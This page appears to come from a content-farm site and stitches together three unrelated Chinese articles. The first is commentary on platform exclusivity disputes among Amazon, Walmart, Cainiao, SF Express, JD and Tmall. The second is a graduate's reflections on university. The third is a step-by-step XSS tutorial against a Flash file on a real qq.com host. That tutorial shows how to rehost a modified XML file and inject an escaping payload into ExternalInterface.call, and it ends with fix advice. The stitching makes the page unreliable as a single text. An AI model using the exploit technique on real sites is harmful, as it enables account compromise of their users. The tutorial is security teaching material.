一 : 那些年 我们在互联网公司之间做的二选一

据外媒报道，亚马逊和沃尔玛之间一直为了争夺新零售市场而多次针锋相对，最近亚马逊137亿美金大手笔收购全食，在美国、加拿大、英国拿到全食的460多家连锁店之后，沃尔玛终于出手了。

不过沃尔玛没有说是收购一两家科技公司或者电商平台以秀肌肉，而是通知部分零售商，如果想获得沃尔玛提供的相关业务，就不能在亚马逊的云计算服务平台Amazon Web Services（简称AWS）上为沃尔玛运行应用程序，让他们进行“二选一”。

虽然对国外的零售商来说，被迫“二选一”是件挺让人头疼的事，有零售商火气上来了正面怼沃尔玛是，“欺负技术供应商，并且对零售商和消费者都不利”，但这事儿要是放在中国的零售商或者用户身上，我们早就习惯了好吗。

快递的二选一：顺丰还是菜鸟

我们就不说过去那些例子了，就说本月月初，菜鸟和顺丰就突然开始互掐，显示菜鸟宣布顺丰关闭了对菜鸟的数据接口，接着顺丰又表示是菜鸟要求丰巢需要返回所有包裹信息，甚至包括非淘系订单的信息，这让顺丰接受不了。随即双方相互“封杀”，淘宝平台上看不到顺丰的运单信息了，顺丰也关闭了对菜鸟的接口。

群众尚在吃瓜的时候，淘宝商家就已经率先懵逼了：贵重商品的寄送，在行业里一般都比较信任顺丰，但是现在淘宝上看不到顺丰的消息了，难道顾客问我物流信息时，我要顾客自己去顺丰查吗？

不过好在，后来国家邮政局强势介入，随后当事双方立刻同意在6月3日中午12点开始，全面恢复业务合作和数据传输。商家和用户也终于松了口气，不用再面对菜鸟和顺丰的二选一难题。

有意思的是，在此次菜鸟和顺丰的互掐中，京东也跑过来添了一把火：阿里不支持顺丰，我们支持啊！而且当时就有人发现在京东平台下单填写配送方式的时候，可以选择将货物投递至就近的丰巢自提柜了。其实从一些角度来说，拥有自营物流的京东和顺丰算是对手，可是京东和顺丰之间的那点小摩擦，和有“血海深仇”的淘宝天猫算起来，那都是浮云了。

618的二选一：京东还是天猫？

以往行业内默认，双十一属于天猫，而618属于京东，而在今年的618年中大促前夕，天猫给出的折扣却异常之狠，这对消费者而言，其实也算是一个二选一，不过这个二选一就更为灵活一些，我们只用择优选择就可以了。但对于商家而言，购物节期间不仅要想办法开活动搞促销，还需要小心注意天猫京东这两个平台的情绪，万一那边的价格比另一边的便宜了，那可能就会惹上麻烦了。

京东手上握着3C的一副好牌，但也想试试做服饰，但这方面的主场一直默认是天猫，于是618期间，网上频频传出有服饰品牌店因为站队天猫而被京东下架清盘。618过后，甚至有自营服饰商家宣布退出京东平台，并称“商家应该有参加活动和不参加活动的自由，也应该有维护自己定价体系的权利”，京东给予的回复声明中也默认了存在活动中让商家二选一的情况。

而天猫方面虽然有心想进军3C市场，但大多数手机厂商，比如努比亚，今年还是习惯性地选择将新产品首发在京东上。天猫那个气啊，手机业务的相关负责人直接在微博中炮轰努比亚是“助纣为虐”。其实，努比亚两边都不想得罪，其产品Z17 mini极光蓝也是只在天猫和苏宁上进行发售，但在这场“猫狗大战”中，努比亚无疑卷入其中里外不是人。

在这场“猫狗大战”中，天猫京东最后的成绩都颇为可观，但是也折损了不少“兵马”。相比之下，一直在场外陪观众吃瓜的苏宁易购反而双丰收，既没有闹出强迫商家二选一的新闻，又赚了个盆满钵满。不过苏宁这种心态到了自己的主场“818”还能不能保持，那就难说了。

“你们有钱人不在乎，我们是穷鬼”

“你们有钱人认不在乎，我们是穷鬼”，这大概是每个被迫二选一的商家最想喊出的一句话，无论是服务云、快递、还是平台，他们都不是大笔一挥百年战略的互联网大佬，只能游走在各方之间，努力寻求高性价比的服务以及用户群广泛的平台。而如果他们必须面对二选一，或许就意味着经营成本的增加。

而对互联网大佬来说，有些二选一纯属“秀肌肉”，让对手和其他行业看到自己强大的竞争力。而有些二选一反而是出出于互联网公司感到的不安，这些公司一旦发现自己的用户有可能会被抢走，就会有过激反应，希望通过“二选一”的方式看到用户表态支持自己，并借此观察自己的用户粘性状态如何，好确保自己的地位还没有被动摇。

对于二选一，中国电子商务研究中心主任曹磊表示，这类行为很难真正说清其中的谁是谁非，但是给商家和消费者造成的负担和困惑在所难免。对于或明或暗胁迫商家“二选一”的这种行为，实际上或涉嫌违反了《反垄断法》和《反不正当竞争法》的规定，而对于强迫商家参与活动、强迫降价等行为，也同样违反了相关法律法规。

另一方面，这些争夺用户的互联网企业与其强迫用户二选一，还不如将自己的产品做好，做出特色，为什么菜鸟顺丰之战大家都站顺丰呢？还不是因为顺丰的快递服务质量好，难道是因为钱多没地方花吗？再说沃尔玛和亚马逊之间，就算沃尔玛线下网点丰富，但若是没有一个能替代亚马逊AWS云服务的系统，那逼迫商家二选一，就只能是一个笑话。

二 : 那些年，我们一起上过的大学...

20号从校长手里接过久违的学位证，思绪万千...大学四年，思想发生很大变化。（www.61k.com)

08年六月我考进湖北工业大学，一所不算怎么好也不算太差的二本院校...被调剂去学计算机网络工程...四年里，我学到很多，感悟到很多...

也许有很多人觉得我是个愤青，是的，我对很多事情表示不满，但我从不承认我是愤青。

关于高考

很多人对高考不满，大学地方保护主义在每所大学都存在，可是你们知不知道，高考几乎是贫寒子弟走向上层社会的唯一途径，这是高考最大的意义所在，与古时候的科举制度如出一辙。高考是中国教育最后的一块遮羞布，你可以否认中国的教育但你不能否认高考，因为高考是公平的，不公平的只是大学的招生政策，但反过来想，与你在同一个地方高考的人却和你是公平的，想到这，如果你拼不过你的老乡你的同学你有什么资格抱怨。

高考固然摧残，固然残酷。但不得不说，没有高考，国将不国。

关于大学

大学的问题很多，腐败的大学机构、僵化的大学制度、小富即安的大学老师、无所事事的大学学子、低就业率、高学费低能力。可是我还是会一遍一遍的告诉我的弟弟妹妹们，中国的大学有很多问题，并且问题难以改变，可是你必须努力上大学，如果你不上大学，你连它是什么样子都不知道，你连抱怨它的资格也没有。

拿着你高中毕业照和你大学毕业照对比一下你就会发现：大学真的可以改变人好多。大学可以改变一个人的世界观，一个人的生活关，更重要的是 大学会改变一个人的气质。

看过很多以前没有上大学的同学现在混的很有钱气势如虹，可我丝毫不羡慕，因为从他们身上我看不到气场看不出气质看不到内涵。

我们在抱怨大学老师、大学考试、大学制度的同时有没有想想好多问题其实出在我们自身，很多人找不到工作，考不上研。我只想说你的失败跟学校屁的关系都没有，不是因为大学不让你得不到，让你得不到的是你自己而已。

关于学生会社团

我曾经在学生会社团混过一年，彻底被一些无聊的策划无聊的活动无聊的会议弄的奔溃，学生会社团是社会的一个小小的缩影。我曾经义无反顾的逃离那里，但是当我大三的时候，我突然又觉得在学生会让我收获了很多。

“学会与各种各样的人打交道是多么重要”，是我在学生会学到最多的，刚上大学的时候什么都不懂，物以类聚人已群分，我们很快就会和那些与我们志同道合意趣相投的人走到一起，可是在学生会这个小社会里，我们得隐藏自己的有些小脾气，学会去适应其它人的个性，得去适应这种生活。在学生会的一年里，我认识了各种各样的朋友，有些是我一开始本来不喜欢的，后来适应了之后就会觉得“好像这人也没看上去那么坏”。能和各种各样的人打交道是一种能力，刚毕业的我也不知道这种能力有多重要，不过我相信它很重要。

与大学一样，学生会是黑暗的，可是如果你没有进去过你依然不知道它是什么样子，所以我依然鼓励我的学弟学妹们加入学生会，但绝不要能太久，一年足够。

关于朋友

如果大学毕业的时候你连两三个狐朋狗友也找不出来，我无法想象你的大学该是有多失败。朋友是相互的，单方面的认为你是他的或者他是你的死党之类的朋友其实连朋友都算不上，因为你们之间连真诚都没有。

我们应该记下那些和兄弟们一起2B过的日子，一起喝酒一起聊妹子一起做小抄一起打dota的那些苦逼日子，因为在我们最空虚最不成熟也最迷茫的时候是朋友陪我们度过。

朋友是一生的财富，高中的朋友经过了四年大学之后已经很少有联系了，而大学朋友却是一辈子的，因为我们不是像高中同学那样患难之交，我们会混在一起完全是因为志同道合，连骨子里的味道都那么相像。

仔细珍惜那些和你志同道合的朋友们，努力去找寻那些和你臭味相投的朋友吧！不要再为你们一起坐公交朋友欠了你一块钱没还而耿耿于怀，也许他是真忘记了也许他觉得把一块钱还给你太见外！不要再为他没跟你打招呼用了你一次洗发水再耿耿于怀，也许他真的是忘了买！不要再因为一次奖学金被别人抢走而耿耿于怀，规则是平等的，过去的都过去了，你多拿那几百块钱就能多长块肉不成？

只有内心真正的豁达才能换来朋友，别任性别逞强。别像个刺猬每个人都去刺两下，别刻薄每个人都要都看你脸色。

关于入党

大一的时候我特别想入党，大二上转预备，大三上转正。我们班第一批，后来想想，如果不那么早，我绝不入党。

从抄那些连我自己都不相信的思想报告，到后来演讲那些连我自己都不相信却还要假装自己相信的转预备申请，到后来更加无语的各种组织材料，我在想我到底做了多少我自己不愿意去做的事情，而这中间我到底又浪费了多少本可以做更多更有意义事情的时间。

我把那时候的入党完全看做是“当年不懂事”！关于入党我实在没有什么好说的，我只是觉得如果任何人想要入党，至少先想想入党是为了什么？

嗯，我们不入党，确实还会有千千万万的大学生会抢着入，可是我只是想表明一种态度，我只想会因为这种态度，我的学弟学妹们会有一点点不同的态度，其实入党没有你想象中的那么必要。

关于恋爱

有人会喷我：你没有谈过，你瞎说什么？

关于大学生谈恋爱，言论铺天盖地，不过不管看哪种言论我觉得都不够客观。

有人说：谈恋爱是大学必修课，所以要谈；

有人说 ：谈恋爱浪费时间，大学四年，投资自己最好，所以不要谈；

而我只想用四个字来形容我的态度：“顺其自然”就好。

我实在不相信四年不谈一次真的以后就学不会恋爱，我也不相信谈了四年你就等于有老婆的人了。我见过毕业就分手，也见过四年之后依然相濡以沫，见过单身四年可是什么都还是没做好，也见过与各种各样的女生暧昧却从来不谈。没有人能评判出那种模式会更好，我们做好自己就好，别让别人的观点影响了你自己的感觉，不为了谈恋爱而去谈恋爱，同样也不为了单身而单身，真爱来了就不要逃。

关于双证

曾经的我不知道双证意味着什么，我考虑过退学，直到找到工作我才知道双证意味着一切。

我只想告诉你：如果你家没背景没钱，那么双证就是你现在最值钱的身外之物。如果你说：我不靠双证我靠能力去挣口饭吃。醒醒吧孩子 你该吃药了。

你以为你是谁？你是比尔你是伯格？很多内地公司的入职都是需要学位证和毕业证，更别说考研！如果你能力很强拿到一家牛逼公司的offer，然后兴高采烈的跟爸妈说我出息了我找到工作了我要来孝敬你们了你们就等着享福吧！突然学校就跟你说你证拿不到了！你明白你父母那种心情吗？你明白那时候你自己的心情吗亲？

所以，每天少打半个小时的dota，每天看看书，考试别作弊被抓了，少挂几科跟老师关系搞好一点清考放过顺利的领到你的双证吧亲。

未完待续...

三 : 那些年我们一起学XSS - 16. Flash Xss进阶 [ExternalInterface.call第二

讲完ExternalInterface.call的第一个参数，我们接着来讲第“2”个参数，之所以2打上引号，因为 call 函数的原型是：call(functionName:String, ... arguments):*， 即后面可以有很多很多个参数，我们统称为第2个参数。有时候我们会遇到ExternalInterface.call("xxxxx","可控内容");的情况，那么这种情况下，如何构造XSS呢？

1. 有了上一节教程的基础，这次我们直接见实例。

通过GOOGLE搜索，site:qq.com filetype:swf inurl:xml

我们可以找到以下FLASH。

http://imgcache.qq.com/qzone_v4/2/default_menu_horizontal.swf?xml_path=http://imgcache.qq.com/qzone/client/custom_menu/custom_menu.xml

2. 借鉴上上节教程的思路，我们可以看看http://imgcache.qq.com/qzone/client/custom_menu/custom_menu.xml里是个什么内容。

3. 好像看不出来是个啥用途，我们反编译FLASH文件。

4. 接着我们先看看是否有getURL, ExternalInterface.call之类的。

可以看到，我们搜索到的是下面这句：

flash.external.ExternalInterface.call("custom_menu_swf", menu_array[_local2].href);

那么call的第一个参数是被限定死了～，第2个参数为 menu_array[_local2].href，

如果你对AS有一点了解，不难看出menu_array是一个数组，那么_local2应该就是数组的下标，

而从单词含义“菜单数组”我们不难联想到上面xml文件里的数据。

5. 换句话说，这里我们的可以控制call的第2个参数。同教程14中的方法，我们下载下来http://imgcache.qq.com/qzone/client/custom_menu/custom_menu.xml。 先做点修改，然后上传到自己网站上。

我们将代码里日志那一行的href改掉。

<menu name="日 志" href="\",alert(1)" />

上传修改后的文件，同时记得将crossdomain.xml上传至自己的网站根目录下哦～～（见教程14）

6. 接着我们载入我们自己指定的XML文件。

http://imgcache.qq.com/qzone_v4/2/default_menu_horizontal.swf?xml_path=http://itsokla.duapp.com/custom_menu.xml

7. 接着我们打开Firefox浏览器。 有人会问，你怎么突然要用Firefox啊！疯了么！！ 同志们，我没疯，只是因为FF可以捕获到这里的错误，而chrome捕获不到！

我们打开Firefox后， 访问上面的地址，点击【日志】按钮！！

Ctrl+shift+J 打开错误控制台！可以看到以下报错！

8. 记性好的朋友，会马上想起上一节里我们说到的。

ExternalInterface.call("函数名","参数1");

实际上执行的是以下内容，

try { __flash__toXML(函数名("参数1")) ; } catch (e) { "<undefined/>"; }

我们就是从FF这里捕获错误到这点的！（:) 当然也还会有其他方法）。

为什么会出错呢? 我们一起来看看。

9. 当我们点击 【日志】按钮时，会调用。

flash.external.ExternalInterface.call("custom_menu_swf", menu_array[_local2].href);

而menu_array[_local2].href 等于 \",alert(1), 进而，我们代入完整的代码，即如下：

try { __flash__toXML(custom_menu_swf("\\",alert(1)")) ; } catch (e) { "<undefined/>"; }

转换过程如下图：

可以看到转换之后，JS代码有点乱，引号到处飞，括号无处寻，因而报错了！

10. 那么我们怎么构造正确的利用代码呢？其实有上一节的知识并不难！

try { __flash__toXML(custom_menu_swf("构造点构造点")) ; } catch (e) { "<undefined/>"; }

首先第一步，要注入自己代码，首先要闭合掉双引号！

try { __flash__toXML(custom_menu_swf("构造点"),alert("构造点")) ; } catch (e) { "<undefined/>"; }

但是从上面转换流程，我们可以看到， " 会变成 \", 即变成了下面的样子，还是突破不出去。

try { __flash__toXML(custom_menu_swf("构造点\"),alert(\"构造点")) ; } catch (e) { "<undefined/>"; }

不过非常庆幸的事情是，这里没有对 \ 进行转义。 我们可以通过输入 \" 来构造。JS的字符串里，\ 用 \\ 表示。如下：

try { __flash__toXML(custom_menu_swf("构造点\\"))}catch(e){alert(1)}//构造点")) ; } catch (e) { "<undefined/>"; }

图片分析如下：

11. 罗嗦了这么多，我们把构造点代码，拿出来，插入到XML文件里。注意以下几点：

11.1 最后构造的代码是\\", 实际我们的输入是\"，然后由FLASH自己转变为\\"的，因而利用代码里只需要输入\"即可。

11.2 由于在XML的节点属性里，双引号写为 "

<menu name="日 志" href="构造点\"))}catch(e){alert(1)}//构造点" />

12. 再次上传文件。打开

http://imgcache.qq.com/qzone_v4/2/default_menu_horizontal.swf?xml_path=http://itsokla.duapp.com/custom_menu.xml

点击日志，看看效果。

修复方案：（www.61k.com]

1. 传入call第2个参数前，对\进行转义。

2. 禁止调用第三方的外部XML文件。

本文标题：那些年我们一起上的学-那些年 我们在互联网公司之间做的二选一
本文地址： http://www.61k.com/1080975.html